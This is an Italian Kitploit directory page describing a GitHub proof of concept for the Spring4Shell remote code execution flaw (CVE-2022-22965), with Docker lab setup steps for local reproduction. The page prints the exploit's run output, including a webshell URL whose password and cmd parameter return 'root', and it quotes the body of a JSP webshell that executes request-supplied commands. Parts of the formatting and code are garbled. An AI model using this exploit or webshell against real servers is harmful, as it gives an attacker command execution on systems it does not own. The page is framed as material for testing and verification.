Skip to content
KitploitKITPLOIT
StrumentiBlog
Log in
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Spring4Shell-POC — Riproduce la vulnerabilità di esecuzione remota di codice Spring4Shell (CVE-2022-22965) con uno script di exploit in Python, distribuendo una webshell JSP su Apache Tomcat per test e verifica. | Kitploit
Strumenti/GitHubGitHub/weijilab/spring4shell-poc
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni Web
GitHubweijilab/spring4shell-poc

Spring4Shell-POC

Riproduce la vulnerabilità di esecuzione remota di codice Spring4Shell (CVE-2022-22965) con uno script di exploit in Python, distribuendo una webshell JSP su Apache Tomcat per test e verifica.

Vedi Repository
1131084 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Spring4Shell-POC

Processo di riproduzione locale della vulnerabilità Spring4Shell

Preparazione dell'ambiente

  • Ambiente docker, docker-compose

  • Pacchettizzazione con mvn, genera `./target/ROOT.war````shell mvn package

* Avviare il servizio```shell
docker-compose up -d
  • Ferma il servizio```shell docker-compose down
## Processo di riproduzione

* Esegui lo script```shell
python3 spring-4-shell-exp.py --url "http://127.0.0.1:8080"
  • Prima esecuzione

Prima esecuzione

  • Seconda esecuzione

Seconda esecuzione

  • Processo di esecuzione``` ➜ spring4shell-poc clear
    ➜ spring4shell-poc python3 spring-4-shell-exp.py --url "http://127.0.0.1:8080" The vulnerability exists, the shell address is :http://127.0.0.1:8080/tomcatwar.jsp?pwd=j&cmd=whoami got response: ➜ spring4shell-poc clear ➜ spring4shell-poc python3 spring-4-shell-exp.py --url "http://127.0.0.1:8080" The vulnerability exists, the shell address is :http://127.0.0.1:8080/tomcatwar.jsp?pwd=j&cmd=whoami got response: root

//

  • if("j".equals(request.getParameter("pwd"))){ java.io.InputStream in = -.getRuntime().exec(request.getParameter("cmd")).getInputStream(); int a = -1; byte[] b = new byte[2048]; while((a=in.read(b))!=-1){ out.println(new String(b)); } } -

➜ spring4shell-poc

* Nel contenitore Docker si può vedere che è stato creato un file jsp nel servizio applicativo Tomcat

![spring-4-shell-web](https://assets.kitploit.com/production/public/readmes/5300/3c171f1bcbfd46534f345a9aee6089e18ced9569afd208bd7eb33cc882246688.png)


* Il web può anche essere accessibile direttamente

![spring-4-shell-web](https://assets.kitploit.com/production/public/readmes/5300/5205a0cd1c694bfa02964a130c6a05ded1c1d1f3a2ce4d96b85d74ed863b85fd.png)


## Punti da notare
Scarica lo strumento